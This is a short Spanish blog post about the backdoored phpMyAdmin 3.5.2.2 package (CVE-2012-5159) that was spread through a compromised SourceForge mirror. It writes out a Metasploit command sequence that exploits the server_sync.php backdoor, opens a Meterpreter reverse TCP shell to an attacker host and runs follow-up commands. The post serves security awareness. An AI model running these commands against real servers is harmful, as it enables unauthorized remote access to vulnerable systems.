Recientemente se ha publicado un error de seguridad en
phpMyAdmin, aunque en realidad el error de seguridad fue provocado por unos de los servidores de descarga de
SourceForge (http://sourceforge.net/).
El Mirror de descargas
cdnetworks-kr-1 de
SourceForge fue comprometido por atacantes malintencionados, quienes modificaron el fichero de descarga
phpMyAdmin-3.5.2.2-all-languages.zip agregándole 2 archivos maliciosos que cumplen con el rol de
Backdoor en el sistema, específicamente el archivo
server_sync.php es el que permite a un atacante ejecutar remotamente código PHP.
A pesar de que recién ayer fue confirmada la vulnerabilidad, Metasploit ya hizo su trabajo (como siempre) y ya existe el módulo que explota este bug (http://dev.metasploit.com/redmine/projects/framework/repository/revisions/3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d/entry/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb).
Aquí les dejo el vídeo de como explotar
CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor con
Metasploit:
use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
También se recomienda a aquellos que tengan phpMyAdmin lo mejor es descargar y reinstalar phpMyAdmin para evitar cualquier tipo de problema.
Más Información:
http://www.phpmyadmin.net/
http://www.securityfocus.com/
http://dev.metasploit.com/
Vídeo:
http://eromang.zataz.com/